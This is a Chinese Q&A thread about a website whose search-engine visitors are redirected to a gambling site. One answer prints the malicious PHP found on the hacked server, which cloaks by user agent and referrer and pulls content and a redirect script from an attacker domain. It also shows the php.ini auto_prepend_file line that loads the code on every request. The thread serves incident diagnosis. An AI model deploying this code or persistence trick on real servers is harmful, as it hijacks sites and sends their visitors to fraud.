网站中了搜索劫持，有什么解决思路吗？

Question

abc代表某网站。

在百度或搜狗搜索abc，然后点击第一条链接，会跳转到赌博网站。

有什么解决思路吗？谢谢了。

Answer 1

可以采用给网站加个 https 证书

Answer 2

服务器确实被黑了，php.ini被人修改。

解决过程

我们在服务器上全目录搜索了关键词8ybct，发现它存在于eaccelerator-86746.042这个文件中，通过查看这个文件，我们发现了/tmp/sess_vqm0cd7f5f8as9ad7sdxs2167这个文件，打开这个文件便是有害代码：

<?php
  $keyword = "ÁùºÏ²Ê";
  $url = 'http://8ybct.com/jiechi/abc.jpg';
  $passurl = "http://8ybct.com/jiechi/abc.js";
  $robot = 0;
  $refer = 0;
  $arrKeyword = explode("|",$keyword);
  $USER_AGENT = strtolower($_SERVER['HTTP_USER_AGENT']);

  if(empty($_SERVER['HTTP_REFERER'])){
          $HTTP_Referer = "n";
  }
  else{
          $HTTP_Referer = strtolower(urldecode($_SERVER['HTTP_REFERER']));
  }

  if(strpos($USER_AGENT,"bot"))
    $robot = 1;

  if(strpos($USER_AGENT,"spider"))
    $robot = 1;

  if(strpos($USER_AGENT,"slurp"))
    $robot = 1;

  if(strpos($USER_AGENT,"mediapartners-google"))
    $robot = 1;

  if($robot == 1 && $_SERVER['REQUEST_URI'] == "/discuss/member.php?mod=logging&action=login&mobile=2"){
        //Header("Location: ".$url);
        echo file_get_contents($url);
        exit;
  }

  if($robot == 1 && $_SERVER['REQUEST_URI'] == "/"){
        //Header("Location: ".$url);
        echo file_get_contents($url);
        exit;
  }

  if(strpos($HTTP_Referer,"www.baidu.com/"))
    $refer = 1;

  if(strpos($HTTP_Referer,"soso.com/"))
    $refer = 1;

  if(strpos($HTTP_Referer,"sogou.com/"))
    $refer = 1;

  if(strpos($HTTP_Referer,"so.com/"))
    $refer = 1;

  if(strpos($HTTP_Referer,"baidu.com"))
    $refer = 1;

  if($refer == 1 && $_SERVER['REQUEST_URI'] == "/discuss/member.php?mod=logging&action=login&mobile=2"){
  echo '<script src="'.$passurl.'"></script>';
  exit;
  }

  if($refer == 1 && $_SERVER['REQUEST_URI'] == "/"){
  echo '<script src="'.$passurl.'"></script>';
  exit;
  }

?>

黑客通过修改php.ini，增加了此配置项：

auto_prepend_file="/tmp/sess_vqm0cd7f5f8as9ad7sdxs2167"

即实现每当有用户请求网站都会在页面头部加上黑客的那段代码，由于这段代码判断了来源链接，所以只要是百度或搜狗的来源就会返回黑客的跳转脚本，即跳转到赌博网站。